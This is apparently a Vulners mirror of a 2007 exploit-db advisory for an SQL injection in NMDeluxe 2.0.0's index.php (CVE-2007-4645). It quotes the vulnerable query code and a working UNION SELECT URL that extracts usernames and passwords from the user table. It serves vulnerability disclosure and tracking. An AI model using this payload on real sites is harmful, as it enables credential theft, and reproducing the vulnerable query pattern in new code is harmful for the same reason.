Lucene search
+L

NMDeluxe 2.0.0 - 'id' SQL Injection

🗓️ 30 Aug 2007 00:00:00Reported by not sec groupType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

'NMDeluxe 2.0.0' 'id' SQL Injection on 'index.php

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-4645
31 Aug 200723:00
cve
cvelist
Cvelist
CVE-2007-4645
31 Aug 200723:00
cvelist
euvd
EUVD
EUVD-2007-4627
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-4645
31 Aug 200723:17
nvd
prion
Prion
Sql injection
31 Aug 200723:17
prion
#########################################################################################
#
#                                    not sec group
#        http://www.notsec.com     [email protected]
#
#
#       [NMDeluxe 2.0.0]
#
# Class:     SQL Injection
# Found:     30/08/2007
# Remote:    Yes
# Site:      http://www.wsdeluxe.com/nmdeluxe/
# Download:  http://downloads.sourceforge.net/nmdeluxe/nmdeluxe2.0.0.zip?modtime=1178396844&big_mirror=0
#
#########################################################################################


      Vulnerable code:
      index.php
============================================================================================================
if($_GET['do'] == 'newspost')
{
  $newsid=addslashes($_GET['id']);

  $sql=mysql_query('SELECT * FROM `'.DB_PFX.'news` WHERE id = ' . $newsid . ' LIMIT ' . $nlim . '');
============================================================================================================


      Exploit :
============================================================================================================================================================================================
http://www.site.com/[nmdeluxe]/index.php?do=newspost&id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3a,password)%20FROM%20nmd_user/*
============================================================================================================================================================================================


      Thanks To:
=================================
All notsec.com members;
White_Sheep for his Bugs Hunter;
=================================

# milw0rm.com [2007-08-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.01165
36